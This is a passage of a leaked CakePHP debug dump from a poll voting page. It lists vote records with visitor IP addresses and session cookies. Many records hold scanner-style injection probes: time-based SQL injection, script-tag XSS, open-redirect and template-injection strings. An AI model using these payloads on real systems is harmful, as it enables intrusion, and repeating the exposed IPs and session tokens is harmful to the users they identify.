'sondage_id' => '2'
),
(int) 7124 => array(
'id' => '7667',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2aScciLvO')) OR 242=(SELECT 242 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 7125 => array(
'id' => '7668',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 7126 => array(
'id' => '7669',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7127 => array(
'id' => '7670',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"',
'sondage_id' => '2'
),
(int) 7128 => array(
'id' => '7671',
'ip' => '85.190.233.47',
'ip1' => '@@Z4KFQ',
'sondage_id' => '2'
),
(int) 7129 => array(
'id' => '7672',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7130 => array(
'id' => '7673',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7131 => array(
'id' => '7674',
'ip' => 'https:\\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7132 => array(
'id' => '7675',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7133 => array(
'id' => '7676',
'ip' => 'https:\\bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7134 => array(
'id' => '7677',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7135 => array(
'id' => '7678',
'ip' => 'https:\\bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7136 => array(
'id' => '7679',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7137 => array(
'id' => '7680',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7138 => array(
'id' => '7681',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7139 => array(
'id' => '7682',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7140 => array(
'id' => '7683',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7141 => array(
'id' => '7684',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7142 => array(
'id' => '7685',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7143 => array(
'id' => '7686',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7144 => array(
'id' => '7687',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7145 => array(
'id' => '7688',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7146 => array(
'id' => '7689',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7147 => array(
'id' => '7690',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7148 => array(
'id' => '7691',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7149 => array(
'id' => '7692',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7150 => array(
'id' => '7693',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7151 => array(
'id' => '7694',
'ip' => '/\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7152 => array(
'id' => '7695',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7153 => array(
'id' => '7696',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7154 => array(
'id' => '7697',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7155 => array(
'id' => '7698',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7156 => array(
'id' => '7699',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7157 => array(
'id' => '7700',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7158 => array(
'id' => '7701',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7159 => array(
'id' => '7702',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7160 => array(
'id' => '7703',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7161 => array(
'id' => '7704',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7162 => array(
'id' => '7705',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7163 => array(
'id' => '7706',
'ip' => '/\/bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7164 => array(
'id' => '7707',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7165 => array(
'id' => '7708',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7166 => array(
'id' => '7709',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7167 => array(
'id' => '7710',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7168 => array(
'id' => '7711',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7169 => array(
'id' => '7712',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7170 => array(
'id' => '7713',
'ip' => '\\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7171 => array(
'id' => '7714',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7172 => array(
'id' => '7715',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7173 => array(
'id' => '7716',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7174 => array(
'id' => '7717',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7175 => array(
'id' => '7718',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7176 => array(
'id' => '7719',
'ip' => '85.190.233.47',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 7177 => array(
'id' => '7720',
'ip' => '85.190.233.47',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 7178 => array(
'id' => '7721',
'ip' => '85.190.233.47',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 7179 => array(
'id' => '7722',
'ip' => '85.190.233.47',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 7180 => array(
'id' => '7723',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7181 => array(
'id' => '7724',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7182 => array(
'id' => '7725',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7183 => array(
'id' => '7726',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7184 => array(
'id' => '7727',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"()&%<zzz><ScRiPt >GRls(9021)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7185 => array(
'id' => '7728',
'ip' => '85.190.233.479173711',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7186 => array(
'id' => '7729',
'ip' => '85.190.233.479957241',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7187 => array(
'id' => '7730',
'ip' => '85.190.233.47',
'ip1' => ''"()&%<zzz><ScRiPt >GRls(9866)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7188 => array(
'id' => '7731',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe29660922',
'sondage_id' => '2'
),
(int) 7189 => array(
'id' => '7732',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"()&%<zzz><ScRiPt >Zq64(9278)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7190 => array(
'id' => '7733',
'ip' => '85.190.233.47',
'ip1' => ''"()&%<zzz><ScRiPt >Zq64(9518)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7191 => array(
'id' => '7734',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe29918438',
'sondage_id' => '2'
),
(int) 7192 => array(
'id' => '7735',
'ip' => '85.190.233.479812578',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7193 => array(
'id' => '7736',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"()&%<zzz><ScRiPt >0EHi(9736)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7194 => array(
'id' => '7737',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"()&%<zzz><ScRiPt >Vb2L(9588)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7195 => array(
'id' => '7738',
'ip' => '85.190.233.47',
'ip1' => ''"()&%<zzz><ScRiPt >0EHi(9056)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7196 => array(
'id' => '7739',
'ip' => '85.190.233.47',
'ip1' => ''"()&%<zzz><ScRiPt >Vb2L(9822)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7197 => array(
'id' => '7740',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe29957329',
'sondage_id' => '2'
),
(int) 7198 => array(
'id' => '7741',
'ip' => '85.190.233.479269988',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7199 => array(
'id' => '7742',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe29160377',
'sondage_id' => '2'
),
(int) 7200 => array(
'id' => '7743',
'ip' => '85.190.233.47',
'ip1' => 'bfg2165%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2165',
'sondage_id' => '2'
),
(int) 7201 => array(
'id' => '7744',
'ip' => '85.190.233.47',
'ip1' => 'bfgx4736%C0%BEz1%C0%BCz2a%90bcxhjl4736',
'sondage_id' => '2'
),
(int) 7202 => array(
'id' => '7745',
'ip' => '85.190.233.47',
'ip1' => '<%={{={@{#{${dfb}}%>',
'sondage_id' => '2'
),
(int) 7203 => array(
'id' => '7746',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7204 => array(
'id' => '7747',
'ip' => '85.190.233.47',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 7205 => array(
'id' => '7748',
'ip' => '85.190.233.47',
'ip1' => '<th:t="${dfb}#foreach',
'sondage_id' => '2'
),
(int) 7206 => array(
'id' => '7749',
'ip' => '85.190.233.47',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 7207 => array(
'id' => '7750',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7208 => array(
'id' => '7751',
'ip' => '85.190.233.47',
'ip1' => '1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>',
'sondage_id' => '2'
),
(int) 7209 => array(
'id' => '7752',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=7dd33da098f50640ed03d9ce7e983243',
'sondage_id' => '2'
),
(int) 7210 => array(
'id' => '7753',
'ip' => '41.201.164.8',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 7211 => array(
'id' => '7754',
'ip' => '105.99.73.143',
'ip1' => 'CAKEPHP=dad22a1ce9d0e11d01036d99b351a787',
'sondage_id' => '2'
),
(int) 7212 => array(
'id' => '7755',
'ip' => '105.99.73.143',
'ip1' => 'CAKEPHP=dad22a1ce9d0e11d01036d99b351a787',
'sondage_id' => '2'
),
(int) 7213 => array(
'id' => '7756',
'ip' => '41.111.20.98',
'ip1' => 'CAKEPHP=d290a42c8d1c82476f1e6e3afa3b4ed2',
'sondage_id' => '2'
),
(int) 7214 => array(
'id' => '7757',
'ip' => '137.135.215.128',
'ip1' => 'CAKEPHP=8925c1915a6bdd6e6a6393c148a110cc',
'sondage_id' => '2'
),
(int) 7215 => array(
'id' => '7758',
'ip' => '105.235.136.144',
'ip1' => 'CAKEPHP=fdb6ecdd7ac8c8cf47f479dfe5f9142d',
'sondage_id' => '2'
),
(int) 7216 => array(
'id' => '7759',
'ip' => '41.109.220.237',
'ip1' => 'CAKEPHP=7fc03bc9c9fe84c45cc8675911a1539a',
'sondage_id' => '2'
),
(int) 7217 => array(
'id' => '7760',
'ip' => '197.117.253.225',
'ip1' => 'CAKEPHP=11f7f8021f1fef4994aedd9b0e039e75',
'sondage_id' => '2'
)
)
)
$ip = '3.146.34.148'
$ip1 = null
$existe = (int) 0
$vote = array(
'id' => '7760',
'ip' => '197.117.253.225',
'ip1' => 'CAKEPHP=11f7f8021f1fef4994aedd9b0e039e75',
'sondage_id' => '2'
)
$proposition = array(
'id' => '35',
'ip' => '',
'nbr_vote' => '5993',
'sondage_id' => '2',
'nom_fr' => 'Acceptable',
'nom_ara' => 'مقبول',
'nom_en' => 'Acceptable '
)
$k = (int) 2
$compteur_f = unknown
$compte = (int) 9596316
$g = (int) 1
$pro = array(
(int) 0 => array(
'Proposition' => array(
'nom_fr' => 'Excellent',
'nbr_vote' => '1631'
)
),
(int) 1 => array(
'Proposition' => array(
'nom_fr' => 'Bon',
'nbr_vote' => '933'
)
),
(int) 2 => array(
'Proposition' => array(
'nom_fr' => 'Acceptable',
'nbr_vote' => '5993'
)
)
)
$value = array(
'Proposition' => array(
'nom_fr' => 'Acceptable',
'nbr_vote' => '5993'
)
)
$key = (int) 2include - APP/View/Layouts/default.ctp, line 374
View::_evaluate() - CORE/Cake/View/View.php, line 971
View::_render() - CORE/Cake/View/View.php, line 933
View::renderLayout() - CORE/Cake/View/View.php, line 546
View::render() - CORE/Cake/View/View.php, line 481
Controller::render() - CORE/Cake/Controller/Controller.php, line 968
Dispatcher::_invoke() - CORE/Cake/Routing/Dispatcher.php, line 200
Dispatcher::dispatch() - CORE/Cake/Routing/Dispatcher.php, line 167
[main] - APP/webroot/index.php, line 118
